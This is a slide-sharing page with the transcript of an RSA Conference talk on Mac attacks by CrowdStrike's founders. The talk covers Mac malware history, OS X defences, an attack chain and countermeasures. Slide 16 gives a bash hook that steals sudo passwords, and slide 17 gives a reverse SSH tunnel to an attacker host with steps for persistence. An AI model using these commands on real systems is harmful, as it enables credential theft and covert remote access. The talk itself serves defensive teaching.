DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
Felipe Prado
 
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
viaForensics
 
The Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersThe Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software Updaters
Priyanka Aash
 
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdfVulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
lior mazor
 

Similar to Hacking Exposed: The Mac Attack (20)

The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
 
Hacking exposed : The adversary Oscars
Hacking exposed : The adversary OscarsHacking exposed : The adversary Oscars
Hacking exposed : The adversary Oscars
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry more
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
How Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us VulnerableHow Smart Thermostats Have Made Us Vulnerable
How Smart Thermostats Have Made Us Vulnerable
 
OSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwareOSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adware
 
Hacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the ShadowsHacking Exposed LIVE: Attacking in the Shadows
Hacking Exposed LIVE: Attacking in the Shadows
 
How to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laosHow to be come a hacker slide for 2600 laos
How to be come a hacker slide for 2600 laos
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
 
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
 
The Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CDThe Emergent Cloud Security Toolchain for CI/CD
The Emergent Cloud Security Toolchain for CI/CD
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-mac
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
 
Attacks on Critical Infrastructure: Insights from the “Big Board”
Attacks on Critical Infrastructure: Insights from the “Big Board”Attacks on Critical Infrastructure: Insights from the “Big Board”
Attacks on Critical Infrastructure: Insights from the “Big Board”
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
 
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014
 
The Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software UpdatersThe Unexpected Attack Vector: Software Updaters
The Unexpected Attack Vector: Software Updaters
 
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdfVulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
 

More from Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Priyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
Priyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
Priyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
Priyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
Priyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
Priyanka Aash
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
Priyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Priyanka Aash
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
Priyanka Aash
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
Priyanka Aash
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
Priyanka Aash
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
Priyanka Aash
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
Priyanka Aash
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Priyanka Aash
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Priyanka Aash
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Priyanka Aash
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Priyanka Aash
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
Priyanka Aash
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
Priyanka Aash
 

More from Priyanka Aash (20)

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdf
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdf
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdf
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdf
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
 
DPDP Act 2023.pdf
DPDP Act 2023.pdfDPDP Act 2023.pdf
DPDP Act 2023.pdf
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdfCyber Truths_Are you Prepared version 1.1.pptx.pdf
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
 
Cyber Crisis Management.pdf
Cyber Crisis Management.pdfCyber Crisis Management.pdf
Cyber Crisis Management.pdf
 
CISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdfCISOPlatform journey.pptx.pdf
CISOPlatform journey.pptx.pdf
 
Chennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdfChennai Chapter.pptx.pdf
Chennai Chapter.pptx.pdf
 
Cloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdfCloud attack vectors_Moshe.pdf
Cloud attack vectors_Moshe.pdf
 
Stories From The Web 3 Battlefield
Stories From The Web 3 BattlefieldStories From The Web 3 Battlefield
Stories From The Web 3 Battlefield
 
Lessons Learned From Ransomware Attacks
Lessons Learned From Ransomware AttacksLessons Learned From Ransomware Attacks
Lessons Learned From Ransomware Attacks
 
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
Emerging New Threats And Top CISO Priorities In 2022 (Chennai)
 
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
Emerging New Threats And Top CISO Priorities In 2022 (Mumbai)
 
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
Emerging New Threats And Top CISO Priorities in 2022 (Bangalore)
 
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow LogsCloud Security: Limitations of Cloud Security Groups and Flow Logs
Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Recently uploaded

Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
RinaMondal9
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
Jen Stirrup
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
nkrafacyberclub
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
UiPathCommunity
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfSAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
Peter Spielvogel
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
James Anderson
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 

Recently uploaded (20)

Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
 
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...The Metaverse and AI: how can decision-makers harness the Metaverse for their...
The Metaverse and AI: how can decision-makers harness the Metaverse for their...
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
Le nuove frontiere dell'AI nell'RPA con UiPath Autopilot™
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfSAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdf
 
Assure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyesAssure Contact Center Experiences for Your Customers With ThousandEyes
Assure Contact Center Experiences for Your Customers With ThousandEyes
 
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 

Hacking Exposed: The Mac Attack

  • 1. SESSION ID: #RSAC Dmitri Alperovitch HACKING EXPOSED: MAC ATTACK EXP-R04 Co-Founder & CTO CrowdStrike Inc. @DAlperovitch George Kurtz Co-Founder, President & CEO CrowdStrike Inc. @George_Kurtz
  • 2. #RSAC GEORGE KURTZ In security for 20 +years President & CEO, CrowdStrike Former CTO, McAfee Former CEO, Foundstone Co-Author, Hacking Exposed 2 A LITTLE ABOUT US:
  • 3. #RSAC DMITRI ALPEROVITCH Co-Founder & CTO, CrowdStrike Former VP Threat Research, McAfee Author of Operation Aurora, Night Dragon, Shady RAT reports MIT Tech Review’s Top 35 Innovator Under 35 for 2013 Foreign Policy’s Top 100 Leading Global Thinkers for 2013 3 A LITTLE ABOUT US:
  • 4. #RSAC The Ninjas Matt Bauer Sr. Software Engineer CrowdStrikeJaron Bradley Sr. Intrusion Analyst CrowdStrike
  • 5. #RSAC Agenda 5 Mac Attacks OSX Security Features Tradecraft The Setup & Attack Plan Demo Countermeasures
  • 6. #RSAC Mac market share rising 6 StatCounter 89.9 90.55 88.83 86.8 84.83 7.47 7.66 8.72 9.33 9.14 0 10 20 30 40 50 60 70 80 90 100 2012 2013 2014 2015 2016 Desktop/Laptop Market Share 2012-2016 Windows Mac
  • 7. #RSAC Mac Attacks 7 Winter 2006: Leap Worm Spreads as an archive sent over iChat to local users Limited harmful impact Fall 2007: RSPlug DNSChanger variant for Mac Distributed as fake video codec on porn sites Changed DNS servers to redirect to phishing and porn sites Fall 2010: Koobface Mac version of infamous Facebook worm
  • 8. #RSAC Mac Attacks (cont) 8 Fall 2011: Flashback Worm > 700,000 infected users Infection via Drive-By Java exploit Winter 2012: Gh0st RAT OSX Variant (MacControl) KEYHOLE PANDA targeted malware targeting Tibetan and Uyghur activists Delivered via Java and Office exploits Summer 2012: OSX/Crisis (Attribution: Hacking Team) Discovered in targeted intrusions Monitors and records Skype, Adium, web browsing Rootkit capabilities
  • 9. #RSAC Mac Attacks (cont) 9 Fall 2013: OSX/Leverage Discovered in targeted intrusions related to Syria Written in RealBasic Winter 2016: FakeFlash Signed fake Flash player update Installs scareware (FakeAV style)
  • 11. #RSAC OSX Security Features 11 Leopard: 2007 Quarantine Bit: extended file attribute flag indicating the file was downloaded from the Web Partial ASLR App Sandbox (Seatbelt) Snow Leopard: 2009 XProtect: AV-style blacklist updated monthly by Apple Lion: 2011 FileVault: full-disk encryption NX, Full ASLR
  • 12. #RSAC OSX Security Features (cont) 12 Mountain Lion: 2012 Gatekeeper Kernel ASLR Mavericks: 2013 Support code-signing for kernel extensions El Capitan: 2015 Full requirement to code-sign kernel extensions System Integrity Protection: prevent root user from tampering with key system files and raise the bar for rootkits and prevent code injection App Transport Security (ATS): HTTPS with forward secrecy by default in apps
  • 14. #RSAC Challenges to solve 14 Initial infiltration: Code Execution How to get around Gatekeeper? Possibilities 1. Exploit browser (eg. Java, Flash, native browser exploit) 2. Exploit productivity app (eg. Office, Preview, Adium) 3. Spearphish user with link/attachment (with Gatekeeper hack)
  • 15. #RSAC Bypassing Gatekeeper 15 Great research by Patrick Wardle @ Synack (VB2015 paper)
  • 16. #RSAC Challenges to solve (cont) 16 Privilege Escalation How to become root? Possibilities 1. Privesc exploit 2. Hook sudo in bash getpwd () { if [[ $BASH_COMMAND == sudo* ]]; then printf “Password:” read –s PASS; echo $PASS >/tmp/com.apple.launchd.pshbnY173 echo –e “nSorry, try again.n” fi } trap getpwd DEBUG 3. Ask the user during install
  • 17. #RSAC Challenges to solve (cont) 17 Persistence and Command & Control How to gain & keep remote access? Possibilities 1. Malware 2. Reverse ssh tunnel ssh –fN –R ${PortFwd}:localhost:22 acc@attackbox a. Save in plist file b. Convert to binary with plutil –convert binary1 ${ASEPplist} c. Save in /System/Library/LaunchDaemons (use SIP exception file)
  • 18. #RSAC Challenges to solve (cont) 18 Stealth How to keep hidden from easy discovery? Possibilities 1. Malware rootkit hooks 2. Bash hooks in /etc/profile “ps aux” before hook “ps aux” after hook
  • 19. #RSAC Challenges to solve (cont) 19 Permanent backdoor How do we quietly backdoor many other systems/applications? Ken Thompson: “Reflections on Trusting Trust” (1984) Lesson: Backdooring the compiler is the ultimate win Idea: Let’s hijack XCode compilation process
  • 20. #RSAC XCode hijacking 20 Yet again - great research by Patrick Wardle (CanSecWest 2015) Dylib hijacking (similar to DLL hijacking on Windows) 1. Place a malicious dylib in the search ppath of XCode application 2. Intercept compilation requests and inject backdoor source code, removing any information from the build log 3. PROFIT!
  • 21. #RSAC Putting it all together: Setup & Attack Plan
  • 22. #RSAC Attack Overview 22 1. Send spearphish “Software Update” package to victim 2. Package it up with signed binary vulnerable to Gatekeeper bypass 3. Steal root password via UI prompt and sudo hook (failsafe) 4. Establish persistent SSH reverse tunnel via ASEP plist 5. Hook /etc/profile to hide our SSH tunnel, files and root activities 6. Steal victim keychain through SSH tunnel 7. Use stolen keychain to move laterally to Windows systems and exfiltrate data (smbutil) 8. Implant Xcode malicious Dylib to backdoor compiled applications 9. WIN!
  • 23. #RSAC Network Setup 23 Windows File Share Victim Mac System Attacker Macbook (for keychain extraction) Attacker C2
  • 25. #RSAC Countermeasures 25 Keep close eye on /etc/profile, /etc/.bashrc, ~/.bash_profile, ~/.bashrc, ~/.bash_logout and ~/.inputrc Monitor for suspicious network connections out of your environment Monitor for any suspicious DYLIB writes to key /Applications and /System directories Use next-generation Endpoint Detect & Response (EDR) solutions
  • 26. #RSAC THANK YOU! 26 HOW TO REACH US: TWITTER: @GEORGE_KURTZ & @DALPEROVITCH LEARN MORE ABOUT NEXT-GENERATION ENDPOINT PROTECTION LEARN ABOUT CROWDSTRIKE FALCON: WWW.CROWDSTRIKE.COM/PRODUCTS REQUEST A DEMO: WWW.CROWDSTRIKE.COM/REQUEST-A-DEMO/ COME MEET US: BOOTH 2045 SOUTH HALL